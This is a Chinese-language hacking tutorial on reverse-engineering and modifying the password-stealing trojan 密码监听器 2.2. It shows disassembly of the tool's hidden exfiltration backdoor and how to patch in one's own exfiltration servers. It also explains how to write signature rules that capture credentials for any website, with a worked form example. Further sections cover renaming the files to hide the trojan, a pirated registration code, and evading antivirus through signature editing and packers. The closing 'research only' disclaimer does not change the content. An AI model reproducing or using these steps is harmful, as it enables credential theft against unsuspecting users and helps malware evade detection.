为了展示软件逆向工程的魅力和非凡的作用，这里向大家完整的讲解对密码监听器进行软件逆向的办法，嘿嘿，看看Crack过的黑客工具将是什么样的。
密码监听器是一款优秀的密码截取木马类软件，它不但可以截取本机上的邮箱、部分网游、FTP、POP3的密码并发到指定邮箱，在集线器(HUB)的情况下，它还能嗅探整个局域网内的密码信息。在本文中以密码监听器的作者网站上发布的最新版本为讲解对象，版本号为2.2，2004年4月3日的更新版本。逆向目的：去除程序后门；增强软件功能，使其能截取几乎所有密码；修改软件参数，使之成为个人专版，更隐蔽；通过加工，使之逃过杀毒软件查杀。听起来非常诱惑很大吧？哈哈，Come on baby!

去除程序后门
密码监听器虽然是个比较好的程序，但软件作者在此程序里设了后门，程序会将密码发送到软件作者的专门信箱。此后门采用MX方式发信，安全性高，软件会自动连接http://freewebs.com/gameabc/smtp.txt获得软件作者设置的最新有效的MX发信服务器地址。不过程序未加壳，我们直接用W32ASM对它进行分析就可以了，突破点也在这里。其中连接http://freewebs.com/gameabc/smtp.txt获得MX发信服务器IP地址的关键代码如下：
*Possible StringData Ref from Data Obj-->"://www."
:00405F7A 68B0664100 push 004166B0
:00405F7F 8D4DEC lea ecx，dword ptr [ebp-14]
* Reference TMFC42.Ordinal:03AD，Ord:03ADh
:00405F82 E837820000 Call 0040E1BE
*Possible StringData Ref from Data Obj-->"http://freewebs.com/gameabc/smtp.txt"
:00405F87 6890664100 push 00416690
:00405F8C 8D4DEC lea ecx，dword ptr [ebp-14]
……
我们用IE直接访问http://freewebs.com/gameabc/smtp.txt，看看有什么东西。

其中202.108.44.180为网易的MX发信服务器IP，999@xxx.com是作者在Mail from指令伪造的E-Mail地址。此软件作者通过网页实时更新的方法，确保了后门的有效性，再看反汇编代码分析程序，还会发现作者还留有一个后门SMTP服务器，地址为card.bta.net.cn，看来作者真是想做到万无一失哦！
分析完毕，开始行动，有种简单的方法就是将其设置的后门发信服务器均改为无效的地址。用WinHEX打开程序，查找http://freewebs.com/gameabc/smtp.txt，换为不存在的网址，随便输入即可，注意字符长度不要超过原来的36位。接着查找card.bta.net.cn换为不存在的地址，如heike.fangxian。此步骤就留给读者完成，没有什么难度的，这样就变成了自己的后门了。

TIPS：有读者朋友会直接想到把Smtp.txt地址以及后门信箱地址换为自己的，当然也可以，这样如果修改后的程序传播出去，无形中自己的后门可就多了很多哦——不过被人暴贬的几率也成几何级增长！慎重慎重，嘿嘿。

打造全能密码截取程序
现在我们来增强软件功能，使它能截取几乎所有密码。该软件采用特征码的方法来截取密码信息。比如窃取80端口的WEB密码的特征码就存放在Webfilter.txt里。

软件只能截取已经包含在特征码里的网站的密码，虽然软件作者已经加了许多著名的信箱、聊天室、论坛和网络游戏的特征码，但因为因特网变化日新月异，有些大家想要记录的密码并不在此特征码文件中。其实我们可以自己增加特征码，加入想要截取密码的目标网址的特征码来扩展程序的功能。
下面就来讲讲特征码的格式及添加方法，拿原来Webfilter.tx中已有的特征码来讲解吧。比如：
2911.net|USERNAME=|USERNAME=;USERNAME=;PASSWORD=;网苑;http://www.2911.net/;1
查看登陆2911.net信箱的网页的HTML源代码，关键代码如下：
<form method="POST" action="http://mail.2911.net/cgi-bin/mail/main.pl">
<input type="hidden" name="LOGIN" value="Log In">
<tr>
<td height="220" width="271" align="right" valign="bottom" class="aa">用户名：</td>
<td height="220" width="154" valign="bottom">
<input type="text" class="cc" name="USERNAME" value="">
</td>
<td height="220" width="262" valign="bottom" class="bb">@2911.net</td>
</tr>
<tr>
<td height="43" width="271" align="right" valign="bottom" class="aa">密 码：</td>
<td height="43" width="154" valign="bottom">
<input type="password" class="cc" name="PASSWORD">
</td>
</tr>
特征码中第一个2911.net应为提交表单Form标记中Action后面的一段网址的主要部分（比如1234.abcd.com特征码就取就是abcd.com），密码监听器只要发现表单提交网址中含有2911.net就开始嗅探。USERNAME、PASSWORD分别为表单中Input域中对应的Name名，而特征码最后面的网苑“;http://www.2911.net/;”则是密码监听器在监听列表以及发送的密码邮件中显示的注释内容，特征码最后的阿拉伯数字则代表了所截获密码的类型，是邮箱还是聊天室还是游戏等等。
知道原理后我们就可以自己随意添加，增强功能了。这里就拿我的论坛做实验，验证可行性吧，网址为http://anyi.wegame.com。打开网站后查看原代码，找到关键表单HTML代码如下：
<form name="form1" method="post" action="http://xyzreg.wegame.com/index.php">
用户名<input type="text" name="ulogon" maxlength="35" size="8">
密码<input type="password" name="upass" maxlength="35" size="8">
<input type="submit" name="Submit" value="确定">
因而按照上面的原理分析，特征码应该为：
wegame.com|ulogon=|upass=;ulogon=;upass=;安翼论坛;http://anyi.wegame.com;4
测试成功。

大家可以按照以上方法自己填加新的特征码，这样就可以截取你任意想要的信箱、论坛、聊天室等密码了。

TIPS：FTP及POP3的特征码增添方法相似，并不难办到，它们的特征码分别在Ftpfilter.txt和Pop3filter.txt中，分别查找、替换就可以了。

打造超强隐蔽个人专版程序
更改程序的默认参数，该软件默认的WEB特征码文件为Webfilter.txt，配置文件为Option.ini。为了增强程序的隐蔽性，我们可以将Webfilter.txt、Ftpfilter.txt、Pop3filter.txt、Option.ini分别改为20041.mid、20042.mid、20043.mid、font.dat。

TIPS：在对这些文件改名时，一定别忘了在主程序Pswmonitor.exe中将其对应文件名一一替换，不然你的程序可是运行不起来的！

我们可以借助eXeScope来修改，这样方便一些。打开eXeScope，依次选择Resource—>string。

在右边的编辑框中可以很方便的将Webfilter.txt、ftpfilter.txt，pop3filter.txt，Option.in分别改为20041.mid，20042.mid，20043.mid，font.dat。如图4的107-111中，懂HTML的朋友可以换掉密码监听器发送密码信息时的版权内容以及邮件主题，这样能加大收信的准确率，不被提供E-mail的网站发觉。如图5中所示，可将密码监听器临时存放密码信息的位置C:\pswauto.htm换个隐蔽的路径及名字。还有一点值得注意的是该软件为共享软件，需要注册码。该程序很好破解，可采用动态调试或分析出算法来得到注册码，也可爆破。相信这些大家都会，不再熬述。在此附带个该软件的注册码，以供不会破解的读者参考，用户名：chinesehack.org，注册码：209432。

永不被杀
逃过杀毒软件查杀的方法有很多种。第一种方法是找程序入口点，算出相对偏移地址，查找16位偏移地址头，逐步试改特征码，可以选择第150或第100块字段，然后将其归零另存，反复测试，直到程序既能正常运行又不被查杀为止，但这样手工做很繁，可以利用现在流行的AV Fengker来自动操作。第二种方法就是大家都熟悉的加壳法。要想完全躲过杀毒软件查杀，最好找ANTI和变异较厉害以及保护得较强的壳，如XPR1.7，Pespin1.0，ExeStealth等，当然也可用些不常用的加壳软件。相信工具的使用大家都会吧，任选一种方法就可以了。

TIPS：本期专门有如何查找、分析后门、木马特征码的文章，有兴趣的朋友可以翻看Icefox的《杀毒软件能奈我何——网络神偷特征码修改实战》一文。

另外大家可用作者写的捆绑工具，把密码监听器的七个文件合并成一个EXE程序，这样就加强了程序的可用性。如果是使用密码监听器木马生成器的话，请参照步骤3中的方法，用eXeScope把密码监听器木马生成器的默认参数改为和你在步骤3中设置的参数相同，相应文件名不能出错。
到这儿，软件逆向大功告成，一个属于自己的完美的密码监听器诞生了。本文所介绍的方法只供研究，勿用于破坏！

http://www.cnxhacker.com/Article/hacker/study/200611/6417.html